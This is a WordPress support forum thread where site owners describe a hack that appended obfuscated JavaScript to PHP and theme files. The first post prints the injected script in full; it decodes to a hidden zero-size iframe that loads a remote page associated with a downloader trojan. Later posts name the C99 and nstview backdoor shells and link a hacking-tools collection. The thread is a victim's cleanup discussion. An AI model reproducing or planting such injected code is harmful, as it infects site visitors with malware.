WordPress 2.3.3 HACKED (17 posts)

  1. Skitals
    Posted 8 years ago #

    Last week my site was hacked. Multiple wordpress files had the following code appended at the very end:

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>

    This was in many wp-*.php files. I wiped my entire websites http root and installed the latest version of WP (2.3.3) since I was running an older version and I knew there were security fixes. I thought I was covered, until last night the same exact exploit was performed on my site. Again, this is a 100% clean 2.3.3 installation. I'm 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files. The only way I even noticed this "hack" is because the code invalidates/breaks my rss feed.

    I found one prior instance of this hack on this board, and it was with an older version of wordpress. I have NOTHING else installed on this site, wordpress 2.3.3 is the only files in my http root. The ONLY plugins I have installed or even on the server are Askimet and Feed Locations.

    Aside from changing my passwords (which I'm certain will not close this loophole), is there any way to prevent this from happening?

  2. Skitals
    Posted 8 years ago #

    As far as I can tell, the only file modified this time around was wp-settings.php. Removing the code from that file fixed my rss feed, but there still may be more modified files that I can't find as there was last time.

  3. moshu
    Posted 8 years ago #

    Yes. You can inform, no, you must inform your host. It might happen that the server has been hacked through another site and from there they (the hackers) got access to all sites on that machine...

  4. whooami
    Posted 8 years ago #

    I'm 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files.

    and the permissions of those files were?



    here are some headers returned by your site:

    HTTP/1.1 200 OK
    Date: Thu, 21 Feb 2008 03:37:32 GMT
    Server: Apache/2.0.54 (Unix) PHP/4.4.7 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2
    X-Powered-By: PHP/5.2.3
    X-Pingback: http://www.gamerawr.com/xmlrpc.php
    Vary: Accept-Encoding
    Content-Type: text/html; charset=UTF-8

    You may not know this but Apache 2.0.54 is a little dated, and there have been several security issues fixed since that release.

    Is that a dreamhost issue, yes, but that doesnt make it any less an issue.

    I point that out not necessarily to cast doubt, but to say that files being physically changed lends credence to it not being a WP hack, but a server side problem related to what is hosting your site OR a permissions weakness that allowed a breach.

    I can put up a static HTML page on an insecure web server with insecure permissions, and I will be able to find someone that is able to tack malicious code onto that file.

  5. Skitals
    Posted 8 years ago #

    Ok, I will be contact dreamhost... but regarding permissions... how should I set my permissions for a wordpress install? You know how WP is, with the over-simplified instructions. I will be honest, I didn't do anything but upload all the files and run the upgrade script.

  6. Skitals
    Posted 8 years ago #

    Ok, a support ticket has been sent to dreamhost. Sorry I was so quick to blame this on WP, I just forgot how many variables there are involved in this, especially when running a site on a shared server I don't administer. I was just under the impression dreamhost was more security conscious than this :(

  7. Skitals
    Posted 8 years ago #

    I checked my permissions of wp-settings.php (the file hacked), and it is set to 644, which I BELIEVE is correct. Please let me know if this shines any new light on the issue.

  8. moshu
    Posted 8 years ago #

    files = 644
    folders = 755
    That's the correct setting. However, on many hosts you need to make folders like wp-content 777 (i.e. world writable) in order to be able to upload images...

  9. whooami
    Posted 8 years ago #

    i'll bet dollars for donuts that dreamhost calls it out as a WP problem :P

    Not to suggest that it might not be, just that it's easier for a host to blame a software package, no matter what the cause.

  10. Skitals
    Posted 8 years ago #

    We will see. I gave them a link to this thread as reference. I've yet to hear back from them.

  11. Skitals
    Posted 8 years ago #

    Crap. It looks like this may all be my own fault. When my site was first hacked with an ancient wordpress version, yes, I erased my entire http root and installed the latest wp release. But what did I copy back? My wp theme. And what was in my theme directory? TWO HACKED PHP/JAVA SCRIPTS!

    One appears to be "nstview", a file management script included with a lot of "web hacking for newbs" kits. It is tagged at the bottom: <!-- Network security team :: nst.void.ru -->

    The is "C99madShell v. 2.0 madnet edition" which also looks to be a remote file manager.

    Now, I have no way of knowing if these are from a related hack, but clearly these are wide open backdoors that hackers somehow installed on my OLD wordpress installation. I can't believe I'm dense enough to not thoroughly check my personal theme directory when I was trying to be so meticulous in my upgrade.

    With these files removed (that entire theme directory, actually), I guess it's now just a game of wait and see. I should do a fine search to see if anything else has been tampered with while this backdoor was in place.

    Interestingly enough BOTH of these shell scripts as well as "PHP Injection Scanner" tools were recently posted in a "web hacking tools collection" posted on this script kiddie site: http://www.katzforums.com/showthread.php?t=50022 No doubt that package has everything that was used in this exploit.

    The only question that remains is: is my site still vulnerable?

  12. Skitals
    Posted 8 years ago #

    I'm nearly certain whoever did this used the hacking toolset I posted above. I'm looking through it all now, and it even includes an xmlrpc vulnerability scanner and exploiter, which is what I believe the latest WP security update patches.

    So it looks like case closed. It was a known wp vulnerability that was recently patched. The moral of the story is: always keep your installation up to date, and DO NOT BLINDLY COPY BACK YOUR CUSTOMIZED FILES. Perhaps the WP readme should make a point of this in the future. While the vulnerability was plugged, I was still left with the malicious software that was installed.

  13. AldebaranJill
    Posted 8 years ago #

    Maybe this is a stupid question, but would putting the wp-admin folder under password protection help at all?

  14. moshu
    Posted 8 years ago #

    No, not really.

  15. AldebaranJill
    Posted 8 years ago #

    So I had a client hacked today who had 2.2.?, and after reading this post, I've installed 2.3.3 and then uploaded the custom theme from my computer (which is clean).

    The attack was similar, they modified a header.php file and added some javascript code at the end. Would it help if I posted the javascript here (I don't want to help these hackers, so I wanted to ask first).

    We were tipped off when the client looked at his blog on his PC and got a virus alert about JS/Downloader-AUD and said it was a Trojan.

    (Note, the client was also on DreamHost)

  16. AldebaranJill
    Posted 8 years ago #

    I just wrote a blog article about this and included a screenshot of the VirusAlert message we received. Hope someone will find this helpful.


  17. BenFitts
    Posted 8 years ago #

    I got the same report from my web host. Someone was reporting JS/Downloader-AUD on one of our blogs.

    The blog was running an older WordPress 2.1.3 version.

    Like AldebaranJill the hacker was able to append their javascript onto the end of the header for my WordPress theme.

    For you reference it had a comment which made me think it was for a stats package, but I knew we were using Google Analytics so I knew this code was probably the offender. It also used some javascript to try and encode the iframe caused by the AUD trojan.

    Here is what I did to fix it:
    I upgraded wordpress to 2.3.3
    I removed the offending javascript code
    I temporarily changed permissions on my theme to 644. (when we make theme changes in the future we'll change the permissions back.)

    I hope this helps others who have had the same problem.
    - Ben Fitts

Topic Closed

This topic has been closed to new replies.

About this Topic